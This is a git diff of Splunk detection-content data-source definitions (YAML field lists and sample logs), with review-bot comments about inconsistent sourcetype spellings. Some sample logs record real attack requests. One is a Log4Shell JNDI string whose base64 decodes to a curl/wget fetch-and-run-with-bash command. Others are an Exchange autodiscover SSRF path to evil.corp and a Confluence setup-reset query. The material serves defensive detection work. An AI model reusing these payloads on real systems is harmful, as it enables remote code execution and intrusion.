- - bytes_out
- - category
- - charset
- - cookie
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest
- - dest_ip
- - dest_port
- - eventtype
- - host
- - http_content_type
- - http_method
- - http_referer
- - http_user_agent
- - http_user_agent_length
- - http_x_forwarded_for
- - http_x_header
- - https
- - index
- - linecount
- - nginx_version
- - product
- - protocol
- - punct
- - request_time
- - response_time
- - server
- - site
- - source
- - sourcetype
- - splunk_server
- - src
- - src_ip
- - status
- - status_description
- - status_type
- - tag
- - tag::eventtype
- - time_local
- - timeendpos
- - timestartpos
- - uri_path
- - uri_query
- - url
- - url_domain
- - url_length
- - vendor
- - vendor_product
- - version
- - web_server
-example_log:
- site="confluence.catjamfest.com" server="confluence.catjamfest.com" dest_port="80"
- dest_ip="10.0.1.23" src="94.131.112.187" src_ip="94.131.112.187" user="-" time_local="22/Oct/2023:03:03:47
- +0000" protocol="HTTP/1.1" status="200" bytes_out="7411" bytes_in="7378" http_referer="-"
- http_user_agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
- like Gecko) Chrome/89.0.4389.114 Safari/537.36" nginx_version="1.18.0" http_x_forwarded_for="-"
- http_x_header="-" uri_query="bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2X5vPeiC6GfiUtoxFW0NDIKQv7i"
- uri_path="/server-info.action" http_method="GET" response_time="0.060" cookie="JSESSIONID=E19F9F16ED5EC7869870D3E9E9E4F548"
- request_time="0.059" category="text/html;charset=UTF-8" https=""
diff --git a/data_sources/web/Palo_Alto_Network_Threat.yml b/data_sources/web/Palo_Alto_Network_Threat.yml
deleted file mode 100644
index f939ef8a44..0000000000
--- a/data_sources/web/Palo_Alto_Network_Threat.yml
+++ /dev/null
@@ -1,34 +0,0 @@
-name: Palo Alto Network Threat
-id: 375c2b0e-d216-41ad-9406-200464595209
-author: Patrick Bareiss, Splunk
-source: pan:threat
-sourcetype: pan:threat
-supported_TA:
- name: Palo Alto Networks Add-on for Splunk
- version: 8.1.1
- url: https://splunkbase.splunk.com/app/2757
-event_names: []
-fields:
- - _time
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - host
- - index
- - linecount
- - punct
- - source
- - sourcetype
- - splunk_server
- - timeendpos
- - timestartpos
-example_log:
- Feb 21 16:10:35 02.examplec.com 1,2023/02/21 16:10:35,016201013292,THREAT,file,2561,2023/02/21
- 16:10:35,6.1.1.2,5.2.1.1,6.1.1.2,5.2.1.1,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.2,zero,2023/02/21
- 16:10:35,685983,1,48598,443,48598,20077,0x1402000,tcp,alert,"payload.zip",ZIP(52004),allow-example-URL,low,client-to-server,7140821242043239124,0x8000000000000000,Germany,United
- States,,,0,,,1,,,,,,,,0,177,204,178,197,,02,1.examplecorp.com/configWizard/keyUpload.jsp,,,,0,,0,,N/A,unknown,AppThreat-8677-7862,0x0,0,4294967295,,,be9fa539-d3c9-43f2-b1cb-ae2c91564e4f,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2023-02-21T16:10:35.249+00:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no
diff --git a/data_sources/web/Splunk_Stream_HTTP.yml b/data_sources/web/Splunk_Stream_HTTP.yml
deleted file mode 100644
index d6a2a49340..0000000000
--- a/data_sources/web/Splunk_Stream_HTTP.yml
+++ /dev/null
@@ -1,40 +0,0 @@
-name: Splunk Stream HTTP
-id: b0070a33-92ed-49e5-8f38-576cdf300710
-author: Patrick Bareiss, Splunk
-source: stream:http
-sourcetype: stream:http
-supported_TA:
- name: Splunk App for Stream
- version: 8.1.1
- url: https://splunkbase.splunk.com/app/1809
-event_names: []
-fields:
- - _time
- - count
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest_ip
- - endtime
- - host
- - index
- - linecount
- - punct
- - source
- - sourcetype
- - splunk_server
- - src_ip
- - sum(bytes)
- - sum(packets_in)
- - sum(packets_out)
- - timeendpos
- - timestamp
- - timestartpos
- - values(flow_id){}
- - vxlan_id
-example_log: ""
diff --git a/data_sources/web/Splunk_Stream_IP.yml b/data_sources/web/Splunk_Stream_IP.yml
deleted file mode 100644
index 3138184d0b..0000000000
--- a/data_sources/web/Splunk_Stream_IP.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-name: Splunk Stream IP
-id: c96f5906-f601-4f32-a26c-482535159bc2
-author: Patrick Bareiss, Splunk
-source: stream:ip
-sourcetype: stream:ip
-supported_TA:
- name: Splunk App for Stream
- version: 8.1.1
- url: https://splunkbase.splunk.com/app/1809
-event_names: []
-fields:
- - _time
- - action
- - app
- - bytes
- - bytes_in
- - bytes_out
- - category
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest
- - dest_ip
- - dest_port
- - eventtype
- - host
- - http_content_type
- - http_method
- - http_referer
- - http_referrer
- - http_user_agent
- - http_user_agent_length
- - http_x_forwarded_for
- - http_x_header
- - https
- - index
- - linecount
- - nginx_version
- - product
- - protocol
- - punct
- - request_time
- - response_time
- - server
- - site
- - source
- - sourcetype
- - splunk_server
- - src
- - src_ip
- - status
- - status_description
- - status_type
- - tag
- - tag::eventtype
- - time_local
- - timeendpos
- - timestartpos
- - uri_path
- - url
- - url_domain
- - url_length
- - vendor
- - vendor_product
- - version
- - web_server
-example_log:
- site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1"
- src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="14/Dec/2021:00:41:27 +0000"
- protocol="HTTP/1.1" status="400" bytes_out="262" bytes_in="196" http_referer="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]"
- http_user_agent="curl/7.58.0" nginx_version="1.21.3" http_x_forwarded_for="-" http_x_header="-"
- uri_query="-" uri_path="/" http_method="GET" response_time="0.004" cookie="-" request_time="0.004"
- category="application/json" https=""
diff --git a/data_sources/web/Windows_IIS.yml b/data_sources/web/Windows_IIS.yml
deleted file mode 100644
index 7ed74c0689..0000000000
--- a/data_sources/web/Windows_IIS.yml
+++ /dev/null
@@ -1,37 +0,0 @@
-name: Windows IIS
-id: d6f31fda-702c-431d-a378-9bf096529764
-author: Patrick Bareiss, Splunk
-source: ms:iis:splunk
-sourcetype: ms:iis:splunk
-separator: None
-supported_TA: {}
-event_names: []
-fields:
-- _time
-- CorrelationID
-- Email
-- X_Rps_CAT
-- cafeReqId
-- charset
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- exchangecookie
-- host
-- index
-- linecount
-- punct
-- source
-- sourcetype
-- splunk_server
-- timeendpos
-- timestartpos
-example_log: 2022-10-03 17:58:25 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json
- @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=985523e1-c41a-49eb-aa80-b15405b78ef5;
- 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499
- - 100.21.120.14 200 0 0 2384 2125 433 - application/soap+xml;charset=UTF-8 on
diff --git a/data_sources/endpoint/Windows_Active_Directory_Admon.yml b/data_sources/windows_active_directory_admon.yml
similarity index 93%
rename from data_sources/endpoint/Windows_Active_Directory_Admon.yml
rename to data_sources/windows_active_directory_admon.yml
index a0517404e8..59abc1131f 100644
--- a/data_sources/endpoint/Windows_Active_Directory_Admon.yml
+++ b/data_sources/windows_active_directory_admon.yml
@@ -1,13 +1,15 @@
name: Windows Active Directory Admon
id: 22bbf4e4-d313-43c1-98ee-808b8775519d
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for Windows Active Directory Admon
source: ActiveDirectory
sourcetype: ActiveDirectory
supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
+- name: Splunk Add-on for Microsoft Windows
url: https://splunkbase.splunk.com/app/742
-event_names: []
+ version: 8.8.0
fields:
- _time
- Guid
diff --git a/data_sources/windows_event_log_application_2282.yml b/data_sources/windows_event_log_application_2282.yml
new file mode 100644
index 0000000000..f7d9a9569e
--- /dev/null
+++ b/data_sources/windows_event_log_application_2282.yml
@@ -0,0 +1,70 @@
+name: Windows Event Log Application 2282
+id: 4490537e-5e0c-46f7-9209-f56f852aa237
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Application 2282
+source: XmlWinEventLog:Application
+sourcetype: XmlWinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- Keywords
+- Level
+- ModuleDll
+- Name
+- Opcode
+- ProcessID
+- ProcessorArchitecture
+- Qualifiers
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor_product
+example_log: 228202000x800000000000001001307Applicationwin-dc-exch01.attackrange.localc:\temp\msf.dllAMD64C1000000
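Review bot: `sourcetype: XmlWinEventLog` on the sourcetype line is spelled differently from the `xmlwineventlog` used by the CAPI2, Defender and Sysmon data sources added in the same commit, while the `XmlWinEventLog:` source prefix is the same in all of them. Splunk search may tolerate the case difference, but anything that compares these strings literally — contentctl's data-source validation, detection metadata, or a lookup keyed on sourcetype — will see two distinct sourcetypes. The same mixed spelling appears in windows_event_log_application_3000.yml and windows_event_log_certificateservicesclient_1007.yml; one spelling, matching what the Splunk Add-on for Microsoft Windows actually assigns, should be used across the whole set.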
diff --git a/data_sources/windows_event_log_application_3000.yml b/data_sources/windows_event_log_application_3000.yml
new file mode 100644
index 0000000000..2415bb058a
--- /dev/null
+++ b/data_sources/windows_event_log_application_3000.yml
@@ -0,0 +1,66 @@
+name: Windows Event Log Application 3000
+id: 3911945d-9222-408d-b851-9b1bce4c2d24
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Application 3000
+source: XmlWinEventLog:Application
+sourcetype: XmlWinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- Qualifiers
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserID
+- Version
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- param1
+- param2
+- param3
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: 300004000x8000000000000021334Applicationwin-host-mhaag-attack-range-117C:\Windows\System32\klist.exe001d8c3afcf370d13
diff --git a/data_sources/windows_event_log_capi2_70.yml b/data_sources/windows_event_log_capi2_70.yml
new file mode 100644
index 0000000000..173081847f
--- /dev/null
+++ b/data_sources/windows_event_log_capi2_70.yml
@@ -0,0 +1,70 @@
+name: Windows Event Log CAPI2 70
+id: 821de0a6-c5b4-491b-a27e-187552792817
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log CAPI2 70
+source: XmlWinEventLog:Microsoft-Windows-CAPI2/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 70047000x4000000000000080308332Microsoft-Windows-CAPI2/Operationalwin-dc-mhaag-attack-range-84.attackrange.local
diff --git a/data_sources/windows_event_log_capi2_81.yml b/data_sources/windows_event_log_capi2_81.yml
new file mode 100644
index 0000000000..8bca7cbb19
--- /dev/null
+++ b/data_sources/windows_event_log_capi2_81.yml
@@ -0,0 +1,80 @@
+name: Windows Event Log CAPI2 81
+id: 463ff898-8135-4c0e-811e-f8629dfc5027
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log CAPI2 81
+source: XmlWinEventLog:Microsoft-Windows-CAPI2/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 81028020x40000000000000402400597Microsoft-Windows-CAPI2/Operationalmswin-server.attackrange.local{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}WTD_UI_NONEWTD_STATEACTION_VERIFY2021-01-07T23:21:42.655ZThe digital signature of the object did not verify.The digital signature of the object did
+ not verify.
diff --git a/data_sources/windows_event_log_certificateservicesclient_1007.yml b/data_sources/windows_event_log_certificateservicesclient_1007.yml
new file mode 100644
index 0000000000..2eb2327c11
--- /dev/null
+++ b/data_sources/windows_event_log_certificateservicesclient_1007.yml
@@ -0,0 +1,72 @@
+name: Windows Event Log CertificateServicesClient 1007
+id: c51444e3-479d-4c4a-b111-e8276a3acf39
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log CertificateServicesClient 1007
+source: XmlWinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational
+sourcetype: XmlWinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Channel
+- Computer
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 100704000x80000000000000002Microsoft-Windows-CertificateServicesClient-Lifecycle-System/OperationalDESKTOP-92OQLA1CN=test.atomic.comtest.atomic.com2024-02-01T17:18:09Z
diff --git a/data_sources/windows_event_log_defender_1121.yml b/data_sources/windows_event_log_defender_1121.yml
new file mode 100644
index 0000000000..6e83bfaa1e
--- /dev/null
+++ b/data_sources/windows_event_log_defender_1121.yml
@@ -0,0 +1,83 @@
+name: Windows Event Log Defender 1121
+id: 84a254c5-7900-4b52-a324-a176adb7c11d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Defender 1121
+source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Channel
+- Computer
+- Detection_Time
+- Engine_Version
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- ID
+- Inhertiance_Flags
+- Involved_File
+- Keywords
+- Level
+- Name
+- New_Value
+- Old_Value
+- Opcode
+- Parent_Commandline
+- Path
+- ProcessID
+- Process_Name
+- Product_Name
+- Product_Version
+- RecordNumber
+- RuleType
+- Security_intelligence_Version
+- SystemTime
+- System_Props_Xml
+- Target_Commandline
+- Task
+- ThreadID
+- User
+- UserID
+- Version
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: 112103000x80000000000000002975Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender
+ Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T16:29:48.984Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000
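Review bot: `source: WinEventLog:Microsoft-Windows-Windows Defender/Operational` is paired with `sourcetype: xmlwineventlog`, whereas every other XML-rendered channel in this commit (Sysmon, CAPI2, Application, CertificateServicesClient) uses the `XmlWinEventLog:<channel>` source prefix for that sourcetype. When the Windows add-on ingests a channel with XML rendering enabled the source is written as `XmlWinEventLog:<channel>`, so a detection or data-source check that filters on this source value would not match the XML events this object describes; if the sample was genuinely collected with classic rendering, the sourcetype is the wrong half instead. This is inferred from the sibling files rather than from an ingest config, so please confirm against the actual events. The same pairing is in windows_event_log_defender_1122.yml, windows_event_log_defender_1129.yml and windows_event_log_defender_5007.yml.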
diff --git a/data_sources/windows_event_log_defender_1122.yml b/data_sources/windows_event_log_defender_1122.yml
new file mode 100644
index 0000000000..214fdd95e7
--- /dev/null
+++ b/data_sources/windows_event_log_defender_1122.yml
@@ -0,0 +1,79 @@
+name: Windows Event Log Defender 1122
+id: 4a2d0499-f489-4557-82f4-f357025cf3e7
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Defender 1122
+source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Channel
+- Computer
+- Detection_Time
+- Engine_Version
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- ID
+- Inhertiance_Flags
+- Keywords
+- Level
+- Name
+- Opcode
+- Parent_Commandline
+- Path
+- ProcessID
+- Process_Name
+- Product_Name
+- Product_Version
+- RecordNumber
+- RuleType
+- Security_intelligence_Version
+- SystemTime
+- System_Props_Xml
+- Target_Commandline
+- Task
+- ThreadID
+- User
+- UserID
+- Version
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: 112204000x80000000000000003701Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender
+ Antivirus4.18.23100.2009E6DB77E5-3DF2-4CF1-B95A-636979351E5B2023-11-26T23:43:08.709Z(unknown user)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe1.401.1247.01.1.23100.2009ENT\ConsRC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x00000000
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1129.yml b/data_sources/windows_event_log_defender_1129.yml
similarity index 56%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1129.yml
rename to data_sources/windows_event_log_defender_1129.yml
index a78ba9b106..cf2d254758 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1129.yml
+++ b/data_sources/windows_event_log_defender_1129.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Defender 1129
+name: Windows Event Log Defender 1129
+id: 0572e119-a48a-4c70-bc58-90e453edacd2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Defender 1129
+source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- ComputerName
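Review bot: `source: WinEventLog:Microsoft-Windows-Windows Defender/Operational` is paired with `sourcetype: xmlwineventlog`, while the Security files in this commit pair `XmlWinEventLog:Security` with that same sourcetype; in the Splunk Windows add-on the `WinEventLog:` source prefix normally belongs to the non-XML rendering, so one of the two values here looks wrong — verify against the input that produced the example_log. The same pairing appears in the new Defender 5007 file, and the RemoteConnectionManager 1149 file adds a third spelling, `sourcetype: wineventlog`, next to `sourcetype: WinEventLog` in the PrintService 316 and 808 files. Splunk search matches these values case-insensitively as far as I know, but any tooling that compares a data-source object against a detection's `sourcetype` as a plain string will not; settle on one spelling per rendering (for example `xmlwineventlog` / `wineventlog`) across the directory. The hunk only shows the head of the file; the remainder of the `fields` list is outside it.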
diff --git a/data_sources/windows_event_log_defender_5007.yml b/data_sources/windows_event_log_defender_5007.yml
new file mode 100644
index 0000000000..a2cd143893
--- /dev/null
+++ b/data_sources/windows_event_log_defender_5007.yml
@@ -0,0 +1,64 @@
+name: Windows Event Log Defender 5007
+id: 27f18792-8d95-4871-8853-874b7faf023f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Defender 5007
+source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- New_Value
+- Old_Value
+- Opcode
+- ProcessID
+- Product_Name
+- Product_Version
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserID
+- Version
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: 500704000x80000000000000003726Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender
+ Antivirus4.18.23100.2009HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_316.yml b/data_sources/windows_event_log_printservice_316.yml
similarity index 55%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_316.yml
rename to data_sources/windows_event_log_printservice_316.yml
index 5adb1ed150..ff94ae97f1 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_316.yml
+++ b/data_sources/windows_event_log_printservice_316.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Printservice 316
+name: Windows Event Log Printservice 316
+id: 12f0be8b-22c0-4fdf-9468-b7ccca824d1d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Printservice 316
+source: WinEventLog:Microsoft-Windows-PrintService/Admin
+sourcetype: WinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- ComputerName
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_808.yml b/data_sources/windows_event_log_printservice_808.yml
similarity index 56%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_808.yml
rename to data_sources/windows_event_log_printservice_808.yml
index 6cd8242d61..2ecb0dbc9b 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_808.yml
+++ b/data_sources/windows_event_log_printservice_808.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Printservice 808
+name: Windows Event Log Printservice 808
+id: e3a26785-4389-4830-8d7b-3dad4252719e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Printservice 808
+source: WinEventLog:Microsoft-Windows-PrintService/Admin
+sourcetype: WinEventLog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- ComputerName
diff --git a/data_sources/windows_event_log_remoteconnectionmanager_1149.yml b/data_sources/windows_event_log_remoteconnectionmanager_1149.yml
new file mode 100644
index 0000000000..8fada924c2
--- /dev/null
+++ b/data_sources/windows_event_log_remoteconnectionmanager_1149.yml
@@ -0,0 +1,59 @@
+name: Windows Event Log RemoteConnectionManager 1149
+id: 08f9edb4-f95f-40be-b1dd-bc3a1cd95aaf
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log RemoteConnectionManager 1149
+source: WinEventLog:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
+sourcetype: wineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Channel
+- Computer
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- UserID
+- Version
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timestamp
+- user_id
+- vendor_product
+example_log: 114904000x10000000000000002064Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operationalar-win-1.attackrange.localAdministratorATTACKRANGE10.0.1.14
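Review bot: The `fields` list for this event carries only the raw `UserData_Xml` container and no per-value field for the connecting address, user or domain, even though the tail of `example_log` (`...AdministratorATTACKRANGE10.0.1.14`) shows exactly those three values; a detection built on this data source has nothing to search on beyond the XML blob. If the add-on extracts them under names such as `Source_Network_Address` or `User` for this sourcetype, they should be listed here — confirm against a live event rather than the sample. The presence of `System_Props_Xml` and `UserData_Xml` also suggests the events were rendered as XML, which does not match `sourcetype: wineventlog` two lines below `source`.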
diff --git a/data_sources/windows_event_log_security_1100.yml b/data_sources/windows_event_log_security_1100.yml
new file mode 100644
index 0000000000..16052bd22c
--- /dev/null
+++ b/data_sources/windows_event_log_security_1100.yml
@@ -0,0 +1,80 @@
+name: Windows Event Log Security 1100
+id: 2a25dafa-691e-4cb2-ae59-07a48867ed9a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 1100
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
